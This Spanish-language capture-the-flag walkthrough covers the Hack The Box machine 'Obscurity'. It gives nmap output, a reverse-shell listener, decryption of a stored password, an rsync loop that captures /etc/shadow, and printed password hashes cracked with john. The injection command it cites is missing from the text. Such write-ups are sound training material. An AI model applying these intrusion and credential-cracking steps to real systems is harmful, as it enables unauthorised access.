Punto de Apoyo Incial
nmap -p- -T5 –open obscurity.htb
Some closed ports may be reported as filtered due to –defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 164.29 seconds
nmap -sV -sC -p 8080 obscurity.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-01 19:24 -05
Nmap scan report for obscurity.htb (10.10.10.168)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
8080/tcp open http-proxy BadHTTPServer
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 02 Dec 2019 00:24:06
| Server: BadHTTPServer
| Last-Modified: Mon, 02 Dec 2019 00:24:06
| Content-Length: 4171
| Content-Type: text/html
| Connection: Closed
| <!DOCTYPE html>
| <html lang=»en»>
| <head>
| <meta charset=»utf-8″>
| <title>0bscura</title>
| <meta http-equiv=»X-UA-Compatible» content=»IE=Edge»>
| <meta name=»viewport» content=»width=device-width, initial-scale=1″>
| <meta name=»keywords» content=»»>
| <meta name=»description» content=»»>
| <!–
| Easy Profile Template
| http://www.templatemo.com/tm-467-easy-profile
| <!– stylesheet css –>
| <link rel=»stylesheet» href=»css/bootstrap.min.css»>
| <link rel=»stylesheet» href=»css/font-awesome.min.css»>
| <link rel=»stylesheet» href=»css/templatemo-blue.css»>
| </head>
| <body data-spy=»scroll» data-target=».navbar-collapse»>
| <!– preloader section –>
| <!–
| <div class=»preloader»>
|_ <div class=»sk-spinner sk-spinner-wordpress»>
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.
org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=12/1%Time=5DE459A8%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,10FC,»HTTP/1\.1\x20200\x20OK\nDate:\x20Mon,\x2002\x20Dec\x2020
SF:19\x2000:24:06\nServer:\x20BadHTTPServer\nLast-Modified:\x20Mon,\x2002\
SF:x20Dec\x202019\x2000:24:06\nContent-Length:\x204171\nContent-Type:\x20t
SF:ext/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20html>\n<html\x20lang=\»
SF:en\»>\n<head>\n\t<meta\x20charset=\»utf-8\»>\n\t<title>0bscura</title>\
SF:n\t<meta\x20http-equiv=\»X-UA-Compatible\»\x20content=\»IE=Edge\»>\n\t<
SF:meta\x20name=\»viewport\»\x20content=\»width=device-width,\x20initial-s
SF:cale=1\»>\n\t<meta\x20name=\»keywords\»\x20content=\»\»>\n\t<meta\x20na
SF:me=\»description\»\x20content=\»\»>\n<!–\x20\nEasy\x20Profile\x20Templ
SF:ate\nhttp://www\.templatemo\.com/tm-467-easy-profile\n–>\n\t<!–\x20st
SF:ylesheet\x20css\x20–>\n\t<link\x20rel=\»stylesheet\»\x20href=\»css/boo
SF:tstrap\.min\.css\»>\n\t<link\x20rel=\»stylesheet\»\x20href=\»css/font-a
SF:wesome\.min\.css\»>\n\t<link\x20rel=\»stylesheet\»\x20href=\»css/templa
SF:temo-blue\.css\»>\n</head>\n<body\x20data-spy=\»scroll\»\x20data-target
SF:=\»\.navbar-collapse\»>\n\n<!–\x20preloader\x20section\x20–>\n<!–\n<
SF:div\x20class=\»preloader\»>\n\t<div\x20class=\»sk-spinner\x20sk-spinner
SF:-wordpress\»>\n»)%r(HTTPOptions,10FC,»HTTP/1\.1\x20200\x20OK\nDate:\x20
SF:Mon,\x2002\x20Dec\x202019\x2000:24:06\nServer:\x20BadHTTPServer\nLast-M
SF:odified:\x20Mon,\x2002\x20Dec\x202019\x2000:24:06\nContent-Length:\x204
SF:171\nContent-Type:\x20text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20
SF:html>\n<html\x20lang=\»en\»>\n<head>\n\t<meta\x20charset=\»utf-8\»>\n\t
SF:<title>0bscura</title>\n\t<meta\x20http-equiv=\»X-UA-Compatible\»\x20co
SF:ntent=\»IE=Edge\»>\n\t<meta\x20name=\»viewport\»\x20content=\»width=dev
SF:ice-width,\x20initial-scale=1\»>\n\t<meta\x20name=\»keywords\»\x20conte
SF:nt=\»\»>\n\t<meta\x20name=\»description\»\x20content=\»\»>\n<!–\x20\nE
SF:asy\x20Profile\x20Template\nhttp://www\.templatemo\.com/tm-467-easy-pro
SF:file\n–>\n\t<!–\x20stylesheet\x20css\x20–>\n\t<link\x20rel=\»stylesh
SF:eet\»\x20href=\»css/bootstrap\.min\.css\»>\n\t<link\x20rel=\»stylesheet
SF:\»\x20href=\»css/font-awesome\.min\.css\»>\n\t<link\x20rel=\»stylesheet
SF:\»\x20href=\»css/templatemo-blue\.css\»>\n</head>\n<body\x20data-spy=\»
SF:scroll\»\x20data-target=\»\.navbar-collapse\»>\n\n<!–\x20preloader\x20
SF:section\x20–>\n<!–\n<div\x20class=\»preloader\»>\n\t<div\x20class=\»s
SF:k-spinner\x20sk-spinner-wordpress\»>\n»);
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.66 seconds
Con la ayuda de burp e intruder, se pudo determinar que existe el script que dice en la portada. SuperSecureServer.py.
Con la ayuda del sitio https://github.com/swisskyrepo/PayloadsAllTheThings se pudo determinar los comandos a inyectar para aprovechar la orden exec que le hace el script a la variable path.
En la máquina del jugador hay que ejecutar:
nv -lvp 4444 y en el navegador se deberá ejecutar el comando de arriba.
Obteniendo el Usuario
www-data@obscure:/tmp$ python3 /home/robert/SuperSecureCrypt.py -d -i /home/robert/passwordreminder.txt -o out.txt -k alexandrovich
txt -o out.txt -k alexandrovicheCrypt.py -d -i /home/robert/passwordreminder.txt
################################
# BEGINNING #
# SUPER SECURE ENCRYPTOR #
################################
############################
# FILE MODE #
############################
Opening file /home/robert/passwordreminder.txt…
Decrypting…
Writing to out.txt…
www-data@obscure:/tmp$ cat out.txt
cat out.txt
SecThruObsFTW
www-data@obscure:/tmp$
mkdir /tmp/SSH
robert@obscure:~/SSH$ cat /tmp/test.sh
while true; do
rsync -a /tmp/SSH /home/robert
done
Obteniendo Root
Ejecutar script Better* y capturar /etc/shadow
robert@obscure:~/SSH$ cat ApfWEyAm
root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7
robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7
unshadow passwd shadow > crack
john –wordlist=../../wordlist/rockyou.txt crack ░▒▓ ✔ took 43s with root at uio-pinfo05 at 08:38:12 ▓▒░
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
mercedes (root)